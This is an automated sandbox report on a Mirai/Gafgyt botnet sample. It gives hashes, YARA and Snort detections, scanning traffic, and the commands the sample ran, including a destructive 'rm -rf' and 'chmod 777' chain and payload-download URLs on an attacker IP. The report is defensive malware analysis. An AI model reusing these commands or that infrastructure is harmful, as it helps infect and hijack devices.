Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
AFWaD3vnqR.elf

Overview

General Information

Sample name:AFWaD3vnqR.elf
renamed because original name is a hash value
Original sample name:d86f1705e5e8b6dd204b285b9b5bdb68.elf
Analysis ID:1412865
MD5:d86f1705e5e8b6dd204b285b9b5bdb68
SHA1:de0855f7475b25346cac04041900e3e949f08100
SHA256:b9c4aaded0e769c3da089f2250370b90158321a402d3856a9eae04911fac77a9
Tags:64elfgafgyt
Infos:

Detection

Mirai, Gafgyt
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Changes permissions of common UNIX (system) binary directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1412865
Start date and time:2024-03-21 05:21:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:AFWaD3vnqR.elf
renamed because original name is a hash value
Original Sample Name:d86f1705e5e8b6dd204b285b9b5bdb68.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://109.205.214.35/mips;
  • VT rate limit hit for: http://109.205.214.35/mpsl;chmod
  • VT rate limit hit for: http://127.0.0.1:52869/picdesc.xml
Command:/tmp/AFWaD3vnqR.elf
PID:5432
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
matrix
Standard Error:
  • system is lnxubuntu20
  • AFWaD3vnqR.elf (PID: 5432, Parent: 5358, MD5: d86f1705e5e8b6dd204b285b9b5bdb68) Arguments: /tmp/AFWaD3vnqR.elf
    • sh (PID: 5433, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf usr/bin && mkdir usr; >usr/bin && mv /tmp/AFWaD3vnqR.elf usr/bin; chmod 777 usr/bin"
      • sh New Fork (PID: 5434, Parent: 5433)
      • rm (PID: 5434, Parent: 5433, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf usr/bin
      • sh New Fork (PID: 5435, Parent: 5433)
      • mkdir (PID: 5435, Parent: 5433, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir usr
      • sh New Fork (PID: 5436, Parent: 5433)
      • mv (PID: 5436, Parent: 5433, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/AFWaD3vnqR.elf usr/bin
      • sh New Fork (PID: 5437, Parent: 5433)
      • chmod (PID: 5437, Parent: 5433, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 usr/bin
  • sh (PID: 5461, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 5461, Parent: 1588, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
AFWaD3vnqR.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    AFWaD3vnqR.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      AFWaD3vnqR.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x19440:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19454:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19468:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1947c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19508:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1951c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19530:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19544:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19558:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1956c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19580:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19594:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x195a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x195bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x195d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      AFWaD3vnqR.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x15ad4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      AFWaD3vnqR.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x16187:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      Click to see the 11 entries
      SourceRuleDescriptionAuthorStrings
      5446.1.0000000000400000.000000000041e000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
        5446.1.0000000000400000.000000000041e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5446.1.0000000000400000.000000000041e000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x19440:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19454:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19468:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1947c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19508:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1951c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19530:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19544:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19558:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1956c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19580:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19594:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x195a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x195bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x195d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          5446.1.0000000000400000.000000000041e000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0x15ad4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          5446.1.0000000000400000.000000000041e000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x16187:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          Click to see the 46 entries
          Timestamp:03/21/24-05:21:54.323417
          SID:2030490
          Source Port:33636
          Destination Port:65535
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/21/24-05:21:51.957294
          SID:2030490
          Source Port:33606
          Destination Port:65535
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/21/24-05:21:50.625160
          SID:2030490
          Source Port:33204
          Destination Port:65535
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: AFWaD3vnqR.elfAvira: detected
          Source: AFWaD3vnqR.elfReversingLabs: Detection: 68%
          Source: AFWaD3vnqR.elfVirustotal: Detection: 62%Perma Link
          Source: AFWaD3vnqR.elfJoe Sandbox ML: detected
          Source: AFWaD3vnqR.elfString: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k/proc//proc/%d/exewgetcurlping/pswiresharktcpdumppythoniptablesnanonvimgdb/proc/maps/fd/proc/net/tcp/bin/systemd/bin/watchdog/bin/busybox/var/SofiamkdirtouchechoHTTPetherapegittelnetdsshdmysqlddropbearencoderpgrepyumtftpftpgetrebootpoweroffshutdownnetcatapt/usr/bin/usr/ftp/usr/sbinusrrm -rf && mkdir ; > && mv ; chmod 777 3f

          Networking

          barindex
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:33204 -> 109.205.214.35:65535
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:33606 -> 109.205.214.35:65535
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:33636 -> 109.205.214.35:65535
          Source: global trafficTCP traffic: 197.4.146.111 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.62.39.206 ports 1,2,3,5,7,37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 41648 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58038 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 41648
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46182 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56548 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 58602 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 46230 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37664 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42736 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46248 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 53326 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 41584 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38120 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41594 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 38120
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50460 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40112 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56656 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40154 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42416 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48124 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42470 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56656 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56656
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56700 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56700
          Source: unknownNetwork traffic detected: HTTP traffic on port 48708 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48744 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 55218 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 41620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41696 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56656
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41696 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45014 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 37978 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 38262 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 41642 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 42018 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 37978 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 36182 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 36220 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45258 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60650 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60702 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58004 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 35346 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 36220 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45224
          Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35146 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45258 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45280 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58348
          Source: unknownNetwork traffic detected: HTTP traffic on port 58398 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45268
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35198 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45280
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58398
          Source: unknownNetwork traffic detected: HTTP traffic on port 35420 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 56824 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50894
          Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50908
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56824 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59606 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58786 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58808 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59606 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44944 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 60538 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54718 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 34996 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56784 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 60180 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34034 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 39548 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 34034 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47596 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46112 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56522 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38404 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 39556 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 56544 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34134 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38426 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38064 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34162 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58922 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40354 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38092 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34034 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50654
          Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 34034
          Source: unknownNetwork traffic detected: HTTP traffic on port 58894 -> 7547
